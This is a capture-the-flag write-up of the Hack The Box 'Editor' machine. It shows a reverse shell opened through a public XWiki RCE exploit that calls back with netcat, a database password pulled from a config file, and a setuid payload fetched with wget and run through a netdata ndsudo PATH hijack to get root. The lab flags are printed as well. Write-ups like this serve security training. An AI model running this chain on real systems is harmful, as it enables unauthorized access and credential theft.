HTB Linux Easy: Editor
Editor is an Easy rated Linux machine on HTB.
Nmap Scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
Nmap scan report for 10.10.11.80
Host is up (0.016s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editor.htb/
8080/tcp open http Jetty 10.0.20
|_http-open-proxy: Proxy might be redirecting requests
| http-title: XWiki - Main - Intro
|_Requested resource was http://10.10.11.80:8080/xwiki/bin/view/Main/
|_http-server-header: Jetty(10.0.20)
| http-cookie-flags:
| /:
| JSESSIONID:
|_ httponly flag not set
| http-robots.txt: 50 disallowed entries (15 shown)
| /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/
| /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/
| /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/
| /xwiki/bin/saveandcontinue/ /xwiki/bin/rollback/ /xwiki/bin/deleteversions/
| /xwiki/bin/cancel/ /xwiki/bin/delete/ /xwiki/bin/deletespace/
|_/xwiki/bin/undelete/
| http-methods:
|_ Potentially risky methods: PROPFIND LOCK UNLOCK
| http-webdav-scan:
| Server Type: Jetty(10.0.20)
| WebDAV type: Unknown
|_ Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Modify hosts file:
1
10.10.11.80 editor.htb
Enumerate HTTP (Port 80)
Found redirect to: http://wiki.editor.htb:
1
2
# Hosts file
10.10.11.80 editor.htb wiki.editor.htb
The footer here reveals the use of the following software: XWiki Debian 15.10.8. Googling this particular version reveals a PoC RCE exploit: Link
Shell as the xwiki user:
1
2
3
4
5
6
7
8
9
python3 CVE-2025-24893.py -t 'http://10.10.11.80:8080' -c 'busybox nc 10.10.14.95 80 -e /bin/bash'
# Shell
nc -lnvp 80
listening on [any] 80 ...
connect to [10.10.14.95] from (UNKNOWN) [10.10.11.80] 59926
id
uid=997(xwiki) gid=997(xwiki) groups=997(xwiki)
Lateral movement
Asking Mistral AI where xwiki commonly stores credentials reveals the following locations:
1
2
/etc/xwiki/hibernate.cfg.xml
/var/lib/xwiki/WEB-INF/hibernate.cfg.xml
Looking through the filesystem for the hibernate.cfg.xml file:
1
2
3
4
find / -name hibernate.cfg.xml 2>/dev/null
/etc/xwiki/hibernate.cfg.xml
/usr/lib/xwiki/WEB-INF/hibernate.cfg.xml
/usr/share/xwiki/templates/mysql/hibernate.cfg.xml
Found a password for the oliver user:
1
2
xwiki@editor:~$ cat /etc/xwiki/hibernate.cfg.xml | grep password
<property name="hibernate.connection.password">theEd1t0rTeam99</property>
SSH as oliver:
1
2
3
4
5
ssh oliver@10.10.11.80
oliver@10.10.11.80's password:
oliver@editor:~$ id
uid=1000(oliver) gid=1000(oliver) groups=1000(oliver),999(netdata)
# Pass: theEd1t0rTeam99
User.txt: b69101abc5fc47fa5bdce9fb659814d5
1
2
cat user.txt
b69101abc5fc47fa5bdce9fb659814d5
Privilege Escalation
Our user is part of the netdata group, inside of the opt directory there is also a netdata folder. The following binary with an SUID bit stands out: Link
To exploit this we must supply a payload with the name of nvme:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
# Prep payload
#include <unistd.h>
int main() {
setuid(0); setgid(0);
execl("/bin/bash", "bash", NULL);
return 0;
}
# Compile & rename
gcc esc.c
mv a.out nvme
# Transfer
wget http://10.10.14.95/nvme
chmod +x nvme
Modify the path variable:
1
export PATH=$PATH:/tmp
Become root:
1
2
3
oliver@editor:~$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-smart-log nvme-list --device a
root@editor:/home/oliver# id
uid=0(root) gid=0(root) groups=0(root),999(netdata),1000(oliver)
Root.txt: 456f22958180787abe8198dbde10c3da
1
2
root@editor:/root# cat root.txt
456f22958180787abe8198dbde10c3da
PWNED!!
